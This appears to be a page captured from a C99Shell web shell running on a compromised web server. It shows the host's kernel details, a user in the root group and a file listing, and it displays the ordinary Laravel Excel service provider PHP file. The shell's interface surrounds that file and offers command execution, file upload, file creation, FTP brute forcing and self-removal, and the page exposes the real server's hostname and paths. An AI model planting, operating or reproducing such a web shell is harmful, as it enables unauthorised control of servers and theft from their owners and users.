!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/maatwebsite/excel/src/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExcelServiceProvider.php (4.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Maatwebsite\Excel;

use 
Illuminate\Database\Eloquent\Builder;
use 
Illuminate\Support\Collection;
use 
Illuminate\Support\ServiceProvider;
use 
Laravel\Lumen\Application as LumenApplication;
use 
Maatwebsite\Excel\Cache\CacheManager;
use 
Maatwebsite\Excel\Console\ExportMakeCommand;
use 
Maatwebsite\Excel\Console\ImportMakeCommand;
use 
Maatwebsite\Excel\Files\Filesystem;
use 
Maatwebsite\Excel\Files\TemporaryFileFactory;
use 
Maatwebsite\Excel\Mixins\DownloadCollectionMixin;
use 
Maatwebsite\Excel\Mixins\DownloadQueryMacro;
use 
Maatwebsite\Excel\Mixins\ImportAsMacro;
use 
Maatwebsite\Excel\Mixins\ImportMacro;
use 
Maatwebsite\Excel\Mixins\StoreCollectionMixin;
use 
Maatwebsite\Excel\Mixins\StoreQueryMacro;
use 
Maatwebsite\Excel\Transactions\TransactionHandler;
use 
Maatwebsite\Excel\Transactions\TransactionManager;

class 
ExcelServiceProvider extends ServiceProvider
{
    
/**
     * {@inheritdoc}
     */
    
public function boot()
    {
        if (
$this->app->runningInConsole()) {
            
$this->publishes([
                
__DIR__ '/Console/stubs/export.model.stub'       => base_path('stubs/export.model.stub'),
                
__DIR__ '/Console/stubs/export.plain.stub'       => base_path('stubs/export.plain.stub'),
                
__DIR__ '/Console/stubs/export.query.stub'       => base_path('stubs/export.query.stub'),
                
__DIR__ '/Console/stubs/export.query-model.stub' => base_path('stubs/export.query-model.stub'),
                
__DIR__ '/Console/stubs/import.collection.stub'  => base_path('stubs/import.collection.stub'),
                
__DIR__ '/Console/stubs/import.model.stub'       => base_path('stubs/import.model.stub'),
            ], 
'stubs');

            if (
$this->app instanceof LumenApplication) {
                
$this->app->configure('excel');
            } else {
                
$this->publishes([
                    
$this->getConfigFile() => config_path('excel.php'),
                ], 
'config');
            }
        }

        if (
$this->app instanceof \Illuminate\Foundation\Application) {
            
// Laravel
            
$this->app->booted(function ($app) {
                
$app->make(SettingsProvider::class)->provide();
            });
        } else {
            
// Lumen
            
$this->app->make(SettingsProvider::class)->provide();
        }
    }

    
/**
     * {@inheritdoc}
     */
    
public function register()
    {
        
$this->mergeConfigFrom(
            
$this->getConfigFile(),
            
'excel'
        
);

        
$this->app->bind(CacheManager::class, function ($app) {
            return new 
CacheManager($app);
        });

        
$this->app->singleton(TransactionManager::class, function ($app) {
            return new 
TransactionManager($app);
        });

        
$this->app->bind(TransactionHandler::class, function ($app) {
            return 
$app->make(TransactionManager::class)->driver();
        });

        
$this->app->bind(TemporaryFileFactory::class, function () {
            return new 
TemporaryFileFactory(
                
config('excel.temporary_files.local_path'config('excel.exports.temp_path'storage_path('framework/laravel-excel'))),
                
config('excel.temporary_files.remote_disk')
            );
        });

        
$this->app->bind(Filesystem::class, function ($app) {
            return new 
Filesystem($app->make('filesystem'));
        });

        
$this->app->bind('excel', function ($app) {
            return new 
Excel(
                
$app->make(Writer::class),
                
$app->make(QueuedWriter::class),
                
$app->make(Reader::class),
                
$app->make(Filesystem::class)
            );
        });

        
$this->app->alias('excel'Excel::class);
        
$this->app->alias('excel'Exporter::class);
        
$this->app->alias('excel'Importer::class);

        
Collection::mixin(new DownloadCollectionMixin);
        
Collection::mixin(new StoreCollectionMixin);
        
Builder::macro('downloadExcel', (new DownloadQueryMacro)());
        
Builder::macro('storeExcel', (new StoreQueryMacro())());
        
Builder::macro('import', (new ImportMacro())());
        
Builder::macro('importAs', (new ImportAsMacro())());

        
$this->commands([
            
ExportMakeCommand::class,
            
ImportMakeCommand::class,
        ]);
    }

    
/**
     * @return string
     */
    
protected function getConfigFile(): string
    
{
        return 
__DIR__ DIRECTORY_SEPARATOR '..' DIRECTORY_SEPARATOR 'config' DIRECTORY_SEPARATOR 'excel.php';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--